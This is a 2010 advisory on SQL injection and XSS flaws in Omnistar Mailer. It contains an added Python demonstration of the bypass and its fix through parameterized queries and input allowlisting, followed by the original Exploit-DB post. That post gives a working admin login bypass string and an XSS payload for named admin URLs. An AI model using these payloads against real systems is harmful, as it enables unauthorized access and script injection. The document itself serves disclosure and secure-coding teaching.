Vendor: Omnistar Mailer
Author: Sid3^effects
CVSS: 7.5 (HIGH)
Vulnerability class: SQL Injection (CWE-89)
Product Name: Omnistar Mailer
Patch Exists: NO
Year: 2010

Omnistar Mailer SQLi Vulnerability

The Omnistar Mailer software is vulnerable to SQL Injection. An attacker can bypass authentication by using the payload ' or 1=1 or ''=' in both the username and password fields.

Mitigation:

The vendor should release a patch to fix the SQL Injection vulnerability. In the meantime, users can mitigate the risk by implementing strict input validation and using parameterized queries.
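The following is an added example, not code from Omnistar Mailer or from the advisory, that shows why the quoted payload defeats a concatenated login query and how the two mitigations named above (parameterized queries, strict input validation) stop it. The table, column names and test credentials are constructed stand-ins; the product's real schema is not on the page.

```python
import re
import sqlite3

# Constructed in-memory stand-in for an admin user table. A plaintext password
# column is used only to keep the example short; real storage should hash.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Anti-pattern (CWE-89): user input is spliced into the SQL text. The
    # advisory's payload closes the quoted literal and appends "or 1=1", so the
    # WHERE clause is always true and a row comes back for any credentials.
    sql = (f"SELECT username FROM admins WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Fix: bound parameters keep the input as data, so the quote characters in
    # the payload never reach the SQL parser as syntax.
    sql = "SELECT username FROM admins WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Second layer: an allowlist for the username field. Assumed policy, not the
# product's; it rejects quotes, spaces and '=' before the query is ever built.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")

def valid_username(username: str) -> bool:
    return _USERNAME_RE.fullmatch(username) is not None

# The bypass string quoted in the advisory, used here as test input.
PAYLOAD = "' or 1=1 or ''='"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login accepts payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized login accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("payload passes username allowlist:", valid_username(PAYLOAD))
```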

Exploit-DB raw data:

##########################################
I'm Sid3^effects member from Inj3ct0r Team
##########################################

Name : Omnistar Mailer SQLi Vulnerability
Date : June 21, 2010
Critical Level : HIGH
Vendor Url : http://www.omnistarmailer.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends luv y0 guyz
#######################################################################################################
Description:
Are you a business and your are looking to increase your profit? Omnistar mailing list software will allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
#######################################################################################################
Xploit: AUTH BYPASS Vulnerability

USE  ' or 1=1 or ''='  in both username and password and you are in

DEMO URL
          http://server/mailerd4/admin/index.php

###############################################################################################################
Xploit: XSS Vulnerability

Attack pattern : "><script>alert("Sid3^effects")</script>
Demo URL : http://server/mailerd4/admin/contacts.php?op=[xss]

###############################################################################################################
# 0day no more
# Sid3^effects